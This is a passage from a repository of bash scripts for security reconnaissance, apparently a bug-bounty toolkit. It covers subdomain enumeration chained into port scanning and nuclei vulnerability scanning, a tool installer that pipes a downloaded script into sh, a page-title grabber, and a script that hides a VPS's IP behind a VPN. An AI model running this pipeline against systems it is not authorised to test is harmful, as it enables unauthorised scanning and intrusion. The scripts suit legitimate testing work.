$? -eq 0 ] && echo -e "$1 -$green Online$end\n" || echo -e "$1 -$red Offline$end\n" 14 | } 15 | 16 | [ -z $2 ] && while read PORT; do SCAN $PORT; done || { PORT=$2; SCAN $PORT; exit; } 17 | -------------------------------------------------------------------------------- /reclass.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | # 3 | # bash script to rename all the files in the given path 4 | # 5 | 6 | [ "$1" == "-h" ] && { echo "#Usage:"; echo "reclass [-h] "; exit; } 7 | 8 | [ -z $1 ] && { read -p "[!] Do You Wanna Rename This Directory? [ $(pwd) ] [Ctrl-c to exit]: "; s=1; } || s=$1 9 | 10 | for i in *; do 11 | [ -z $2 ] && e=$i || e=$2 12 | [ -f $i ] && [[ "$i" != "class"* ]] && { mv -n "$i" "class-$s.$e"; let s+=1; } 13 | done 14 | 15 | echo "[+] Done!" 16 | 17 | -------------------------------------------------------------------------------- /recon.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | # 3 | # Combined Tools: 4 | # https://github.com/bing0o/SubEnum/ 5 | # https://github.com/tomnomnom/hacks/tree/master/filter-resolved 6 | # https://github.com/projectdiscovery/naabu 7 | # https://github.com/tomnomnom/httprobe 8 | # https://github.com/projectdiscovery/nuclei/ 9 | # 10 | # 11 | 12 | [ -z "$1" ] && { printf "[!] auto.sh \n"; exit; } 13 | 14 | temps="$HOME/tools/nuclei-templates/all/" 15 | 16 | subenum -s -d $1 | tee subs-$1 | filter-resolved -c 50 | sudo $(which naabu) -silent -t 50 -ports 80,81,443,3000,6443,8000,8001,8008,8080,8083,8443,8834,8888,9090 | httprobe -c 50 | tee hosts-$1 | sort -u | nuclei -c 50 -t "$temps" -o nuclei-$1.logs 17 | 18 | 19 | -------------------------------------------------------------------------------- /send-to-burp.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | # 3 | # Usage: $ ./burp.sh "" 4 | # $ cat URLs.txt | ./burp.sh 5 | 6 | SEND() { 7 | curl -sk "$1" -x http://127.0.0.1:8080 &>/dev/null 8 | } 9 | 10 | [ -z "$1" ] && while read URL; do SEND "$URL"; done || SEND "$1" 11 | -------------------------------------------------------------------------------- /setup-tools.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | # 3 | # Bash script i use to install some hacking tools 4 | # 5 | 6 | 7 | 8 | printf "update and upgrade:\n" 9 | sudo apt update -y 10 | sudo apt upgrade -y 11 | 12 | 13 | printf "[*] Setup Your SHELL:\n" 14 | printf "[+] Installing ZSH:\n" 15 | sudo apt install -y zsh 16 | sudo apt install -y wget git 17 | 18 | printf "[+] Installing OhMyZsh:\n" 19 | export RUNZSH=no 20 | sh -c "$(curl -fsSL https://raw.githubusercontent.com/ohmyzsh/ohmyzsh/master/tools/install.sh)" 21 | 22 | printf "[+] Installing Syntax-Highlighting:\n" 23 | git clone https://github.com/zsh-users/zsh-syntax-highlighting.git ${ZSH_CUSTOM:-~/.oh-my-zsh/custom}/plugins/zsh-syntax-highlighting 24 | 25 | printf "[+] Installing ZSH-autosuggestions:\n" 26 | git clone https://github.com/zsh-users/zsh-autosuggestions ${ZSH_CUSTOM:-~/.oh-my-zsh/custom}/plugins/zsh-autosuggestions 27 | 28 | printf "[+] Installing fzf:\n" 29 | git clone --depth 1 https://github.com/junegunn/fzf.git ~/.fzf && ~/.fzf/install 30 | 31 | printf "Oh-My-Tmux:" 32 | sudo apt install -y tmux 33 | cd 34 | git clone https://github.com/gpakosz/.tmux.git 35 | ln -s -f .tmux/.tmux.conf 36 | cp .tmux/.tmux.conf.local . 37 | 38 | printf "[+] Done" 39 | 40 | printf "\n#####################\n\n" 41 | 42 | printf "[*] Setup Your Environment:\n" 43 | printf "[+] Install Golang:\n" 44 | 45 | wget https://golang.org/dl/go1.15.2.linux-amd64.tar.gz -O golang.tar.gz 1>/dev/null 46 | 47 | read -t 120 -p "Enter Path 'GOROOT': " local 48 | [ -z "$local" ] && local=/usr/local && [ -d "$local" ] || mkdir -p "$local" 49 | tar -C $local -xzf golang.tar.gz 1>/dev/null 50 | 51 | mkdir $HOME/bin 52 | mkdir $HOME/tools 53 | export GOROOT=$local/go 54 | export GOPATH=$HOME/go 55 | export PATH=$PATH:$GOROOT/bin:$GOPATH/bin:$HOME/bin 56 | 57 | echo "export GOROOT=$local/go" >> $HOME/.zsh_profile 58 | echo "export GOPATH=$HOME/go" >> $HOME/.zsh_profile 59 | echo 'export PATH=$PATH:$GOROOT/bin:$GOPATH/bin:$HOME/bin' >> $HOME/.zsh_profile 60 | echo 'source $HOME/.zsh_profile' >> $HOME/.zshrc 61 | 62 | source $HOME/.zsh_profile 63 | 64 | printf "[+] Done" 65 | 66 | printf "\n#########################\n\n" 67 | 68 | 69 | printf "[*] Setup Your Tools:\n" 70 | 71 | printf "Make & GCC:\n" 72 | sudo apt install -y make gcc 73 | 74 | printf "SubFinder:\n" 75 | GO111MODULE=on go get -u -v github.com/projectdiscovery/subfinder/v2/cmd/subfinder 76 | 77 | printf "Amass:\n" 78 | GO111MODULE=on go get -v github.com/OWASP/Amass/v3/... 79 | 80 | printf "Nuclei:\n" 81 | GO111MODULE=on go get -u -v github.com/projectdiscovery/nuclei/v2/cmd/nuclei 82 | 83 | printf "Nuclei-Templates:\n" 84 | git clone https://github.com/projectdiscovery/nuclei-templates $HOME/tools/nuclei-templates 85 | 86 | printf "HTTProbe:\n" 87 | go get -u github.com/tomnomnom/httprobe 88 | 89 | printf "Assetfinder:\n" 90 | go get -u github.com/tomnomnom/assetfinder 91 | 92 | printf "Gron:\n" 93 | go get -u github.com/tomnomnom/gron 94 | 95 | printf "Filter-Resolved:\n" 96 | go get github.com/tomnomnom/hacks/filter-resolved 97 | 98 | printf "ANew\n" 99 | go get -u github.com/tomnomnom/anew 100 | 101 | printf "Kxss:\n" 102 | go get -u github.com/tomnomnom/hacks/kxss 103 | 104 | printf "GF:\n" 105 | go get -u github.com/tomnomnom/gf 106 | 107 | printf "UnfURL:\n" 108 | go get -u github.com/tomnomnom/unfurl 109 | 110 | printf "FFUF:\n" 111 | go get github.com/ffuf/ffuf 112 | 113 | printf "CF-check:\n" 114 | go get -u github.com/dwisiswant0/cf-check 115 | 116 | printf "Naabu:\n" 117 | GO111MODULE=on go get -v github.com/projectdiscovery/naabu/cmd/naabu 118 | 119 | printf "Gau\n" 120 | GO111MODULE=on go get -u -v github.com/lc/gau 121 | mv "$GOPATH/bin/gau" "$GOPATH/bin/ggau" 122 | 123 | printf "Webanalyze:\n" 124 | go get -u github.com/rverton/webanalyze/... 125 | 126 | printf "Pencode:\n" 127 | go get -u github.com/ffuf/pencode/cmd/pencode 128 | 129 | printf "Wuzz:\n" 130 | go get github.com/asciimoo/wuzz 131 | 132 | printf "Shuffledns:\n" 133 | GO111MODULE=on go get -u -v github.com/projectdiscovery/shuffledns/cmd/shuffledns 134 | 135 | printf "HTTPx:\n" 136 | GO111MODULE=on go get -u -v github.com/projectdiscovery/httpx/cmd/httpx 137 | 138 | printf "GoSpider:\n" 139 | go get -u github.com/jaeles-project/gospider 140 | 141 | printf "Go-Dork:\n" 142 | GO111MODULE=on go get -v github.com/dwisiswant0/go-dork/... 143 | 144 | printf "Hakrawler:\n" 145 | go get github.com/hakluke/hakrawler 146 | 147 | printf "Qsreplace:\n" 148 | go get -u github.com/tomnomnom/qsreplace 149 | 150 | printf "SubJS:\n" 151 | GO111MODULE=on go get -u -v github.com/lc/subjs 152 | 153 | printf "Bash Scripting:\n" 154 | git clone https://github.com/bing0o/bash_scripting/ $HOME/tools/bash_scripting 155 | 156 | printf "Python Scripts:\n" 157 | git clone https://github.com/bing0o/Python-Scripts/ $HOME/tools/Python-Scripts 158 | 159 | printf "git-dumper:\n" 160 | git clone https://github.com/arthaud/git-dumper $HOME/tools/git-dumper 161 | 162 | printf "Arjun:\n" 163 | git clone https://github.com/s0md3v/Arjun $HOME/tools/Arjun 164 | 165 | printf "MassDNS:\n" 166 | apt install -y make 167 | git clone https://github.com/blechschmidt/massdns $HOME/tools/massdns 168 | cd $HOME/tools/massdns && make && cp ./bin/massdns $HOME/bin 169 | 170 | printf "Chaospy:\n" 171 | git clone https://github.com/dr-0x0x/chaospy $HOME/tools/chaospy 172 | 173 | printf "AEM Hacker:\n" 174 | git clone https://github.com/0ang3el/aem-hacker/ $HOME/tools/aem-hacker 175 | 176 | printf "SubEum:\n" 177 | wget https://raw.githubusercontent.com/bing0o/SubEnum/master/subenum.sh -O $HOME/bin/subenum 178 | chmod +x $HOME/bin/subenum 179 | 180 | printf "nmap:\n" 181 | sudo apt install -y nmap 182 | 183 | printf "masscan:\n" 184 | sudo apt install -y masscan 185 | 186 | printf "JQ:\n" 187 | sudo apt -y install jq 188 | -------------------------------------------------------------------------------- /title.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | # 3 | # bash script to check for the title of the page for domains or ips 4 | # 5 | 6 | PRG=${0##*/} 7 | VERSION="2020-05-23" 8 | 9 | Usage(){ 10 | while read -r line; do 11 | printf "%b\n" "$line" 12 | done <<-EOF 13 | \r$PRG:\t\t - Tool reads a list of Domanis or IPs and gives you: The Title of the page. 14 | \r 15 | \rOptions: 16 | \r -l, --list - List of Domains or IPs. 17 | \r -t, --Threads - Threads number (Default: 5). 18 | \r -o, --output - The output file to save the results. 19 | \r -p, --path - To use a specific path e.g(/robots.txt). 20 | \r -h, --help - Displays this Informations and Exit. 21 | \r -v, --version - Displays The Version 22 | \rExample: 23 | \r $PRG -l domains.txt -t 20 -o titles.txt 24 | \r 25 | 26 | EOF 27 | } 28 | 29 | list=False 30 | threads=5 31 | out=False 32 | color=True 33 | path=False 34 | 35 | while [ -n "$1" ]; do 36 | case $1 in 37 | -l|--list) 38 | [ -z "$2" ] && { printf "[-] -l/--list needs a File (list of Domains or IPs)\n"; exit 1; } 39 | list=$2 40 | shift ;; 41 | -t|--threads) 42 | [ -z "$2" ] && { printf "[-] -t/--threads needs a number of threads\n"; exit 1; } 43 | threads=$2 44 | shift ;; 45 | -p|--path) 46 | [ -z "$2" ] && { printf "[-] -p/--path needs a path ex(/robots.txt)\n"; exit 1; } 47 | path=$2 48 | shift ;; 49 | -o|--output) 50 | [ -z "$2" ] && { printf "[-] -o/--output needs a file to write the results to.\n"; exit 1; } 51 | out=$2 52 | shift ;; 53 | -h|--help) 54 | Usage 55 | exit ;; 56 | -v|--version) 57 | printf "$VERSION\n" 58 | exit ;; 59 | -n|--nocolor) 60 | color=False;; 61 | *) 62 | printf "[-] Error: Unknown Options: $1\n" 63 | Usage; exit 1 ;; 64 | esac 65 | shift 66 | done 67 | 68 | mycurl(){ 69 | path=$4 70 | if [[ "$path" == False ]]; then 71 | path="" 72 | elif [[ "$path" != "/"* ]]; then 73 | path="/"$path 74 | fi 75 | res=$(curl --connect-timeout 10 $1$path -so - | grep -iPo '(?<=)(.*)(?=)') #curl -sk "$1$path" --connect-timeout 10 -w '%{http_code},%{url_effective},%{size_download},%{redirect_url}\n' -o /dev/null) 76 | out=$2 77 | title="\e[32m$res\e[0m" 78 | url="\e[34m$1\e[0m" 79 | echo -e "$url | $title" 80 | [ $out != False ] && echo "$res" >> $out 81 | 82 | } 83 | 84 | 85 | main(){ 86 | cat $list | xargs -I{} -P $threads bash -c "mycurl '{}' $out $color $path" 87 | } 88 | 89 | [ "$list" == False ] && { 90 | printf "[!] Argument -l/--list is Required!\n" 91 | Usage 92 | exit 1 93 | } || { 94 | export -f mycurl 95 | main 96 | } 97 | 98 | -------------------------------------------------------------------------------- /vpn_on_vps.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | # 3 | # sometimes you need to change your VPS' ip using a VPN without losing your ssh connection, 4 | # well, this script does exactly that. 5 | # 6 | # but not sure about DNS leaks and other stuff that could expose your IP, 7 | # be carefull when using this method. 8 | # 9 | # 1. SSH to your VPS. 10 | # 2. Run this script. 11 | # 3. Run your VPN client. 12 | # 13 | # your connection will not be closed and the ip of your VPS will be changed. 14 | 15 | 16 | myip=$(curl ifconfig.me -sk) 17 | 18 | ip rule add table 137 from ${myip} 19 | 20 | baseip=$(echo ${myip} | cut -d"." -f1-3) 21 | 22 | ip route add table 137 to ${baseip}.0/24 dev eth0 23 | ip route add table 137 default via ${baseip}.1 24 | 25 | printf "[+] Now run your Openvpn in a tmux or screen session.!\n" 26 | --------------------------------------------------------------------------------